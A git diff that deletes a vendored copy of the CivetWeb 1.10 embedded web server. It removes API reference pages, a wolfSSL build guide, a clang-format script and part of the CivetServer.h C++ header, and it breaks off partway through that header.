-`int mg_websocket_ready_handler( struct mg_connection *conn, void *cbdata );`
-`int mg_websocket_data_handler( struct mg_connection *conn, int opcode, char * buf, size_t buf_len, void *cbdata );`
-`int mg_websocket_close_handler( const struct mg_connection *conn,  void *cbdata );`
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_set_websocket_handler()` connects callback functions to a websocket URI. The callback functions are called when a state change is detected on the URI like an incomming connection or data received from a remote peer.
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_start.md b/thirdparty/civetweb-1.10/docs/api/mg_start.md
deleted file mode 100644
index c597d55..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_start.md
+++ /dev/null
@@ -1,39 +0,0 @@
-# Civetweb API Reference
-
-### `mg_start( callbacks, user_data, options );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`callbacks`**|`const struct mg_callbacks *`| A structure with optional callback functions to process requests from the web server |
-|**`user_data`**|`void *`| A pointer to optional user data |
-|**`options`**|`char **`| A list of options used to initialize the web server. The list consists of an NULL terminated list of option-value string pairs. |
-
-The option list can be used to set the following options:
-
-| Option | Default | Description |
-| :--- | :--- | :--- |
-| **`cgi_environment`** | *empty* | The option `cgi_environment` can contain extra variables to be passed to the CGI script in addition to the standard environment variables. The lust must be a comma separated list of name=value pairs like this: `VARIABLE1=VALUE1,VARIABLE2=VALUE2`.|
-| **`cgi_interpreter`**| *empty* | The option `cgi_interpreter` can contain a path to an executable which will be used as a CGI interpreter for **all** CGI scripts regardless of the script file extension. If this option is not set (which is the default), CivetWeb looks at the first line of a CGI script to see if an interpreter is defined there. This first line is formatted as a shebang line as common in unix style shell scripts, but this will also work in Windows. For more information about the syntax, please see the Wikipedia page about the [shebang line](http://en.wikipedia.org/wiki/Shebang_(Unix\)).|
-| | |For example on a Windows system where both PHP and Perl CGI scripts are used, `#!/path/to/php-cgi.exe` and `#!/path/to/perl.exe` must be the first line of the respective CGI scripts. Note that the paths should be either full file paths, or file paths relative to the current working directory of the CivetWeb server. The current working directory may be dependent on the way the application is started. When started from the command line it is the directory from where the executable was called, but when starting it from a shortcut in a graphical desktop environment, it will be the directory where the executable is located, the default directory of the user or a directory mentioned in the shortcut, depending on the operating system and graphical user interface used.|
-| | |If all CGIs use the same interpreter, it is more efficient to set the option `cgi_interpreter` to the path to that executable because in that case no processing of the shebang line is necessary. When using PHP, be sure to point tot php-cgi(.exe) and not the php(.exe) executable, as the latter is a stand alone interpreter which doesn't interface over CGI with CivetWeb.
-| **`cgi_pattern`** | `**.cgi$|**.pl$|**.php$` | All files that match `cgi_pattern` are treated as CGI files. The default pattern allows CGI files to be anywhere. To restrict CGIs to a certain directory, use `/path/to/cgi-bin/**.cgi` as a pattern. Note that the full path of the local file is matched against the pattern, not the URI provided in the client request.|
-|**`put_delete_auth_file`**| *empty* | The option `put_delete_auth_file` defines the password file to be used for PUT and DELETE requests. Without a password file it is not possible to put new files to the server, or to delete existing ones. This only applies to direct HTTP requests which use the PUT and DELETE methods without server side scripting. PUT and DELETE requests might still be handled by Lua scripts and CGI pages. |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_context *`| A pointer to a context structure when successful, or NULL in case of failure |
-
-### Description
-
-The function `mg_start()` is the only function needed to call to initialize the webserver. After the function returns and a pointer to a context structure is provided, it is guaranteed that the server has started and is listening on the designated ports. In case of failure a NULL pointer is returned.  The behaviour of the web server is controlled by a list of callback functions and a list of options.  The callback functions can do application specific processing of events which are encountered by the webserver. If a specific callback function is set to NULL, the webserver uses their default callback routine. The options list controls how the webserver should be started and contains settings for for example the ports to listen on, the maximum number of threads created to handle requests in parallel and if settings for SSL encryption.
-
-As a side effect on Unix systems, SIGCHLD and SIGPIPE signals will be ignored. If custom processing is needed for these signals, signal handlers must be setup after the call to `mg_start()` has completed.
-
-### See Also
-
-* [`struct mg_callbacks;`](mg_callbacks.md)
-* [`mg_stop();`](mg_stop.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_start_thread.md b/thirdparty/civetweb-1.10/docs/api/mg_start_thread.md
deleted file mode 100644
index e817226..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_start_thread.md
+++ /dev/null
@@ -1,26 +0,0 @@
-# Civetweb API Reference
-
-### `mg_start_thread( func, cbdata );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`func`**|`mg_thread_func_t`|Function to start as a separate thread|
-|**`cbdata`**|`void *`|User defined data to be passed to the thread as parameter|
-
-`void mg_thread_func_t( void *cbdata );`
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Success or error code|
-
-### Description
-
-The function `mg_start_thread()` is a convenience function to create a detached thread. The function returns **0** when successful and another value if an error occured. A pointer to user supplied data can be passed which is then passed further on to the thread function as parameter.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_stop.md b/thirdparty/civetweb-1.10/docs/api/mg_stop.md
deleted file mode 100644
index ea0d246..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_stop.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Civetweb API Reference
-
-### `mg_stop( ctx );`
-
-#### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|**`struct mg_context *`**| A pointer to the current webserver context |
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_stop()` is used to stop and cleanup a running webserver. A pointer to the context of the running webserver is provided as a parameter. The execution of this function may take some time because it waits until all threads have stopped and returns all memory to the heap. After the function returns, the location the context pointer points to is invalid. The function does not return a return value and it is therefore not possible to know if stopping the webserver succeeded or not.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
-* [`mg_start_thread();`](mg_start_thread.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_store_body.md b/thirdparty/civetweb-1.10/docs/api/mg_store_body.md
deleted file mode 100644
index 4cde44a..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_store_body.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_store_body( conn, path );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|connection on which to read the data|
-|**`path`**|`const char *`|file to store the request body|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`long long`|Number of bytes written to the file, or an error code|
-
-### Description
-
-The function `mg_store_body()` stores the body of an incoming request to a data file. The function returns the number of bytes stored in the file, or a negative value to indicate an error.
-
-### See Also
-
-* [`mg_read();`](mg_read.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_strcasecmp.md b/thirdparty/civetweb-1.10/docs/api/mg_strcasecmp.md
deleted file mode 100644
index cba6b92..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_strcasecmp.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_strcasecmp( s1, s2 );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`s1`**|`const char *`|First string to compare|
-|**`s2`**|`const char *`|Second string to compare|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Integer value with the result of the comparison|
-
-### Description
-
-The function `mg_strcasecmp()` is a helper function to compare two strings. The comparison is case insensitive. The return value is **0** if both strings are equal, less then zero if the first string is less than the second in a lexical comparison, and greater than zero if the first string is greater than the second.
-
-### See Also
-
-* [`mg_strncasecmp();`](mg_strncasecmp.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_strncasecmp.md b/thirdparty/civetweb-1.10/docs/api/mg_strncasecmp.md
deleted file mode 100644
index b4affd6..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_strncasecmp.md
+++ /dev/null
@@ -1,25 +0,0 @@
-# Civetweb API Reference
-
-### `mg_strncasecmp( s1, s2, len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`s1`**|`const char *`|First string in the comparison|
-|**`s2`**|`const char *`|Second string in the comparison|
-|**`len`**|`size_t`|The maximum number of characters to compare|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The result of the comparison|
-
-### Description
-
-The function `mg_strncasecmp()` is a helper function to compare two strings. The comparison is case insensitive and only a limited number of characters are compared. This limit is provided as third parameter in the function call. The return value is **0** if both strings are equal, less then zero if the first string is less than the second in a lexical comparison, and greater than zero if the first string is greater than the second.
-
-### See Also
-
-* [`mg_strcasecmp();`](mg_strcasecmp.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_unlock_connection.md b/thirdparty/civetweb-1.10/docs/api/mg_unlock_connection.md
deleted file mode 100644
index b74138f..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_unlock_connection.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Civetweb API Reference
-
-### `mg_unlock_connection( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|Connection to remove the lock from|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_unlock_connection()` removes the lock on a connection which was previously set with a call to [`mg_lock_connection()`](mg_lock_connection.md). Locking may be necessary when using [`mg_write()`](mg_write.md) or [`mg_printf()`](mg_printf.md) on websocket connections to prevent data corruption.
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_lock_context();`](mg_lock_context.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_unlock_context();`](mg_unlock_context.md)
-* [`mg_websocket_client_write();`](mg_websocket_client_write.md)
-* [`mg_websocket_write();`](mg_websocket_write.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_unlock_context.md b/thirdparty/civetweb-1.10/docs/api/mg_unlock_context.md
deleted file mode 100644
index a630acd..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_unlock_context.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Civetweb API Reference
-
-### `mg_unlock_context( ctx );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The context to remove the lock from|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_unlock_contect()` removes a lock put previously on a context with a call to [`mg_lock_context()`](mg_lock_context.md). Locking a context may be necessary when accessing shared resources.
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_lock_context();`](mg_lock_context.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_upload.md b/thirdparty/civetweb-1.10/docs/api/mg_upload.md
deleted file mode 100644
index de7f1c8..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_upload.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Civetweb API Reference
-
-### ~~`mg_upload( conn, destination_dir );`~~
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|Connection on which files to upload|
-|**`destination_dir`**|`const char *`|The destination directory to upload to|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Success or error code|
-
-### Description
-
-The function `mg_upload()` is deprecated and may be removed from future releases. Use of this function is therefore highly discouraged.
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_url_decode.md b/thirdparty/civetweb-1.10/docs/api/mg_url_decode.md
deleted file mode 100644
index 6794088..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_url_decode.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Civetweb API Reference
-
-### `mg_url_decode( src, src_len, dst, dst_len, is_form_url_encoded );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`src`**|`const char *`|Source data to convert|
-|**`src_len`**|`int`|Length of the source buffer|
-|**`dst`**|`char *`|Destination buffer to store the result|
-|**`dst_len`**|`int`|Length of the destination buffer|
-|**`is_form_url_encoded`**|`int`|Not equal zero when form decoding must be used|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The number of bytes stored in the destination buffer, or **-1** if the buffer doesn't exist or is too small|
-
-### Description
-
-The function `mg_url_decode()` Decodes a in input buffer. Both normal URIs and form URIs can be decoded. In the latter case the space character is converted to a `+` as defined in [RFC 1866](http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt) in section 8.2.1.
-
-### See Also
-
-* [`mg_url_encode();`](mg_url_encode.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_url_encode.md b/thirdparty/civetweb-1.10/docs/api/mg_url_encode.md
deleted file mode 100644
index 465af12..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_url_encode.md
+++ /dev/null
@@ -1,25 +0,0 @@
-# Civetweb API Reference
-
-### `mg_url_encode( src, dst, des_len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`src`**|`const char *`|Input string to encode|
-|**`dst`**|`char *`|Destination buffer to store the encoded result|
-|**`dst_len`**|`size_t`|Length of the destination buffer including the terminating NUL|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The number of characters written in the destination buffer|
-
-### Description
-
-The function `mg_url_encode()` encodes a in input buffer. Both normal URIs and form URIs can be encoded. In the latter case the space character is converted to a `+` as defined in [RFC 1866](http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt) in section 8.2.1.
-
-### See Also
-
-* [`mg_url_decode();`](mg_url_decode.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_version.md b/thirdparty/civetweb-1.10/docs/api/mg_version.md
deleted file mode 100644
index a31128b..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_version.md
+++ /dev/null
@@ -1,19 +0,0 @@
-# Civetweb API Reference
-
-### `mg_version();`
-
-### Parameters
-
-*none*
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char *`| A pointer to a text with the current CivetWeb version |
-
-### Description
-
-The function `mg_version()` can be used to return the current CivetWeb version.  The function returns a pointer to a string with the current major and minor version number separated with a dot, for example "1.9".
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_websocket_client_write.md b/thirdparty/civetweb-1.10/docs/api/mg_websocket_client_write.md
deleted file mode 100644
index f792f4c..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_websocket_client_write.md
+++ /dev/null
@@ -1,32 +0,0 @@
-# Civetweb API Reference
-
-### `mg_websocket_client_write( conn, opcode, data, data_len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|Connection on which to send data|
-|**`opcode`**|`int`|Opcode|
-|**`data const`**|`char *`|The data to be written|
-|**`data_len`**|`size_t`|Length of the data buffer|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Number of bytes written or an error code|
-
-### Description
-
-The function `mg_websocket_client_write()` sends data to a websocket server wrapped in a masked websocket frame. The function issues calls to [`mg_lock_connection()`](mg_lock_connection.md) and [`mg_unlock_connection()`](mg_unlock_connection.md) to ensure that the transmission is not interrupted. Interruption can happen the the application is proactively communicating and responding to a request simultaneously. This function is available only, if Civetweb is compiled with the option `-DUSE_WEBSOCKET`.
-
-The return value is the number of bytes written on success, **0** when the connection has been closed and **-1** if an error occured.
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-* [`mg_websocket_write();`](mg_websocket_write.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_websocket_write.md b/thirdparty/civetweb-1.10/docs/api/mg_websocket_write.md
deleted file mode 100644
index 3c7eadc..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_websocket_write.md
+++ /dev/null
@@ -1,34 +0,0 @@
-# Civetweb API Reference
-
-### `mg_websocket_write( conn, opcode, data, data_len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|Connection on which the data must be written|
-|**`opcode`**|`int`|Opcode|
-|**`data`**|`const char *`|Data to be written to the client|
-|**`data_len`**|`size_t`|Length of the data|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Number of bytes written or an error code|
-
-### Description
-
-The function `mg_websocket_write()` sends data to a websocket client wrapped in a websocket frame. The function issues calls to [`mg_lock_connection()`](mg_lock_connection.md) and [`mg_unlock_connection()`](mg_unlock_connection.md) to ensure that the transmission is not interrupted. Data corruption can otherwise happen if the application is proactively communicating and responding to a request simultaneously.
-
-The function is available only when Civetweb is compiled with the `-DUSE_WEBSOCKET` option.
-
-The function returns the number of bytes written, **0** when the connection has been closed and **-1** if an error occurred.
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-* [`mg_websocket_client_write();`](mg_websocket_client_write.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_write.md b/thirdparty/civetweb-1.10/docs/api/mg_write.md
deleted file mode 100644
index d501857..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_write.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_write( conn, buf, len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer to the connection to be used to send data |
-|**`buf`**|`const void *`| A pointer to the blob of information to be sent |
-|**`len`**|`size_t`| The amount of bytes to be sent |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| An integer indicating the amount of bytes sent, or failure |
-
-### Description
-
-The function `mg_write()` can be used to send a blob of arbitrary data over a connection. The size of the data is provided as a parameter. The only length limitation on this function is `MAX_INT`, because the return value of this function will turn negative with larger blocks of data, although they may have been sent correctly. The function returns the amount of bytes sent in case of success, the value **0** when the connection has been closed, and **-1** in case of an error.
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_printf();`](mg_print.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-* [`mg_websocket_client_write();`](mg_websocket_client_write.md)
-* [`mg_websocket_write();`](mg_websocket_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/yaSSL.md b/thirdparty/civetweb-1.10/docs/yaSSL.md
deleted file mode 100644
index 7f2e85f..0000000
--- a/thirdparty/civetweb-1.10/docs/yaSSL.md
+++ /dev/null
@@ -1,87 +0,0 @@
-Adding wolfSSL (formerly CyaSSL) support
-=====
-
-In order to support SSL *HTTPS* connections in Civetweb,
-you may wish to use the GPLv2 licensed CyaSSL library.  By using this
-library, the resulting binary may have to have the GPL license unless
-you buy a commercial license from [wolfSSL](http://www.yassl.com/).
-
-*Note: The following instructions have not been checked for the most recent versions of CivetWeb and wolfSSL. Some information might be outdated.*
-
-
-Getting Started
-----
-
-- Download Cayssl at https://www.wolfssl.com (formerly http://www.yassl.com/)
-- Extract the zip file
-    - To make this seemless, extract to a directory parallel to with Civetweb is
-
-### Example Project
-
-If you download cyaSSL to cyassl-2.7.0 in a directory parallel to Civetweb, you can open the *VS/civetweb_yassl* solution in Visual Studio.
-
-Build Configuration
-----
-
-#### Required include paths for both civetweb and cyassl
- - *cyassl_directory*\
- - *cyassl_directory*\cyassl\
-
-#### Required civetweb preprocessor defines
- - USE_YASSL
- - NO_SSL_DL
-
-#### Required cySSL preprocessor defines
- - OPENSSL_EXTRA
- - HAVE_ERRNO_H
- - HAVE_GETHOSTBYNAME
- - HAVE_INET_NTOA
- - HAVE_LIMITS_H
- - HAVE_MEMSET
- - HAVE_SOCKET
- - HAVE_STDDEF_H
- - HAVE_STDLIB_H
- - HAVE_STRING_H
- - HAVE_SYS_STAT_H
- - HAVE_SYS_TYPES_H
-
-#### Required CyaSSL source files
-
- - ctaocrypt/src/aes.c
- - ctaocrypt/src/arc4.c
- - ctaocrypt/src/asn.c
- - ctaocrypt/src/coding.c
- - ctaocrypt/src/des3.c
- - ctaocrypt/src/dh.c
- - ctaocrypt/src/dsa.c
- - ctaocrypt/src/ecc.c
- - ctaocrypt/src/error.c
- - ctaocrypt/src/hc128.c
- - ctaocrypt/src/hmac.c
- - ctaocrypt/src/integer.c
- - ctaocrypt/src/logging.c
- - ctaocrypt/src/md2.c
- - ctaocrypt/src/md4.c
- - ctaocrypt/src/md5.c
- - ctaocrypt/src/memory.c
- - ctaocrypt/src/misc.c
- - ctaocrypt/src/pwdbased.c
- - ctaocrypt/src/rabbit.c
- - ctaocrypt/src/random.c
- - ctaocrypt/src/ripemd.c
- - ctaocrypt/src/rsa.c
- - ctaocrypt/src/sha.c
- - ctaocrypt/src/sha256.c
- - ctaocrypt/src/sha512.c
- - ctaocrypt/src/tfm.c
- - src/crl.c
- - src/internal.c
- - src/io.c
- - src/keys.c
- - src/ocsp.c
- - src/sniffer.c
- - src/ssl.c
- - src/tls.c
-
-
-
diff --git a/thirdparty/civetweb-1.10/format.bat b/thirdparty/civetweb-1.10/format.bat
deleted file mode 100755
index e1ce640..0000000
--- a/thirdparty/civetweb-1.10/format.bat
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/bin/sh
-clang-format -i src/civetweb.c
-clang-format -i src/main.c
-clang-format -i src/CivetServer.cpp
-clang-format -i src/civetweb_private_lua.h
-clang-format -i src/md5.inl
-clang-format -i src/sha1.inl
-clang-format -i src/mod_lua.inl
-clang-format -i src/mod_duktape.inl
-clang-format -i src/timer.inl
-clang-format -i src/handle_form.inl
-
-clang-format -i src/third_party/civetweb_lua.h
-
-clang-format -i include/civetweb.h
-clang-format -i include/CivetServer.h
-
-clang-format -i test/public_func.h
-clang-format -i test/public_func.c
-clang-format -i test/public_server.h
-clang-format -i test/public_server.c
-clang-format -i test/private.h
-clang-format -i test/private.c
-clang-format -i test/private_exe.h
-clang-format -i test/private_exe.c
-clang-format -i test/shared.h
-clang-format -i test/shared.c
-clang-format -i test/timertest.h
-clang-format -i test/timertest.c
-clang-format -i test/civetweb_check.h
-clang-format -i test/main.c
-
-clang-format -i examples/embedded_c/embedded_c.c
diff --git a/thirdparty/civetweb-1.10/include/CivetServer.h b/thirdparty/civetweb-1.10/include/CivetServer.h
deleted file mode 100644
index 2da1096..0000000
--- a/thirdparty/civetweb-1.10/include/CivetServer.h
+++ /dev/null
@@ -1,611 +0,0 @@
-/* Copyright (c) 2013-2017 the Civetweb developers
- * Copyright (c) 2013 No Face Press, LLC
- *
- * License http://opensource.org/licenses/mit-license.php MIT License
- */
-
-#ifndef _CIVETWEB_SERVER_H_
-#define _CIVETWEB_SERVER_H_
-#ifdef __cplusplus
-
-#include "civetweb.h"
-#include <map>
-#include <string>
-#include <vector>
-#include <stdexcept>
-
-// forward declaration
-class CivetServer;
-
-/**
- * Exception class for thrown exceptions within the CivetHandler object.
- */
-class CIVETWEB_API CivetException : public std::runtime_error
-{
-  public:
-	CivetException(const std::string &msg) : std::runtime_error(msg)
-	{
-	}
-};
-
-/**
- * Basic interface for a URI request handler.  Handlers implementations
- * must be reentrant.
- */
-class CIVETWEB_API CivetHandler
-{
-  public:
-	/**
-	 * Destructor
-	 */
-	virtual ~CivetHandler()
-	{
-	}
-
-	/**
-	 * Callback method for GET request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handleGet(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for POST request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handlePost(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for HEAD request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handleHead(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for PUT request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handlePut(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for DELETE request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handleDelete(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for OPTIONS request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handleOptions(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for PATCH request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handlePatch(CivetServer *server, struct mg_connection *conn);
-};
-
-/**
- * Basic interface for a URI authorization handler.  Handler implementations
- * must be reentrant.
- */
-class CIVETWEB_API CivetAuthHandler
-{
-  public:
-	/**
-	 * Destructor
-	 */
-	virtual ~CivetAuthHandler()
-	{
-	}
-
-	/**
-	 * Callback method for authorization requests. It is up the this handler
-	 * to generate 401 responses if authorization fails.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if authorization succeeded, false otherwise
-	 */
-	virtual bool authorize(CivetServer *server, struct mg_connection *conn) = 0;
-};
-
-/**
- * Basic interface for a websocket handler.  Handlers implementations
- * must be reentrant.
- */
-class CIVETWEB_API CivetWebSocketHandler
-{
-  public:
-	/**
-	 * Destructor
-	 */
-	virtual ~CivetWebSocketHandler()
-	{
-	}
-
-	/**
-	 * Callback method for when the client intends to establish a websocket
-	 *connection, before websocket handshake.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true to keep socket open, false to close it
-	 */
-	virtual bool handleConnection(CivetServer *server,
-	                              const struct mg_connection *conn);
-
-	/**
-	 * Callback method for when websocket handshake is successfully completed,
-	 *and connection is ready for data exchange.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 */
-	virtual void handleReadyState(CivetServer *server,
-	                              struct mg_connection *conn);
-
-	/**
-	 * Callback method for when a data frame has been received from the client.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @bits: first byte of the websocket frame, see websocket RFC at
-	 *http://tools.ietf.org/html/rfc6455, section 5.2
-	 * @data, data_len: payload, with mask (if any) already applied.
-	 * @returns true to keep socket open, false to close it
-	 */
-	virtual bool handleData(CivetServer *server,
-	                        struct mg_connection *conn,
-	                        int bits,
-	                        char *data,
-	                        size_t data_len);
-
-	/**
-	 * Callback method for when the connection is closed.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 */
-	virtual void handleClose(CivetServer *server,
-	                         const struct mg_connection *conn);
-};
-
-/**
- * CivetCallbacks
- *
- * wrapper for mg_callbacks
- */
-struct CIVETWEB_API CivetCallbacks : public mg_callbacks {
-	CivetCallbacks();
-};
-
-/**
- * CivetServer
- *
- * Basic class for embedded web server.  This has an URL mapping built-in.
- */
-class CIVETWEB_API CivetServer
-{
-  public:
-	/**
-	 * Constructor
-	 *
-	 * This automatically starts the sever.
-	 * It is good practice to call getContext() after this in case there
-	 * were errors starting the server.
-	 *
-	 * Note: CivetServer should not be used as a static instance in a Windows
-	 * DLL, since the constructor creates threads and the destructor joins
-	 * them again (creating/joining threads should not be done in static
-	 * constructors).
-	 *
-	 * @param options - the web server options.
-	 * @param callbacks - optional web server callback methods.
-	 *
-	 * @throws CivetException
-	 */
-	CivetServer(const char **options,
-	            const struct CivetCallbacks *callbacks = 0,
-	            const void *UserContext = 0);
-	CivetServer(std::vector<std::string> options,
-	            const struct CivetCallbacks *callbacks = 0,
-	            const void *UserContext = 0);
-
-	/**
-	 * Destructor
-	 */
-	virtual ~CivetServer();
-
-	/**
-	 * close()
-	 *
-	 * Stops server and frees resources.
-	 */
-	void close();
-
-	/**
-	 * getContext()
-	 *
-	 * @return the context or 0 if not running.
-	 */
-	const struct mg_context *
-	getContext() const
-	{
-		return context;
-	}
-
-	/**
-	 * addHandler(const std::string &, CivetHandler *)
-	 *
-	 * Adds a URI handler.  If there is existing URI handler, it will
-	 * be replaced with this one.
-	 *
-	 * URI's are ordered and prefix (REST) URI's are supported.
-	 *
-	 *  @param uri - URI to match.
-	 *  @param handler - handler instance to use.
-	 */
-	void addHandler(const std::string &uri, CivetHandler *handler);
-
-	void
-	addHandler(const std::string &uri, CivetHandler &handler)
-	{
-		addHandler(uri, &handler);
-	}
-
-	/**
-	 * addWebSocketHandler
-	 *
-	 * Adds a WebSocket handler for a specific URI.  If there is existing URI
-	 *handler, it will
-	 * be replaced with this one.
-	 *
-	 * URI's are ordered and prefix (REST) URI's are supported.
-	 *
-	 *  @param uri - URI to match.
-	 *  @param handler - handler instance to use.
-	 */
-	void addWebSocketHandler(const std::string &uri,
-	                         CivetWebSocketHandler *handler);
-
-	void
-	addWebSocketHandler(const std::string &uri, CivetWebSocketHandler &handler)
-	{
-		addWebSocketHandler(uri, &handler);
-	}
-
-	/**
-	 * removeHandler(const std::string &)
-	 *
-	 * Removes a handler.
-	 *
-	 * @param uri - the exact URL used in addHandler().
-	 */
-	void removeHandler(const std::string &uri);
-
-	/**
-	 * removeWebSocketHandler(const std::string &)
-	 *
-	 * Removes a web socket handler.
-	 *
-	 * @param uri - the exact URL used in addWebSocketHandler().
-	 */
-	void removeWebSocketHandler(const std::string &uri);
-
-	/**
-	 * addAuthHandler(const std::string &, CivetAuthHandler *)
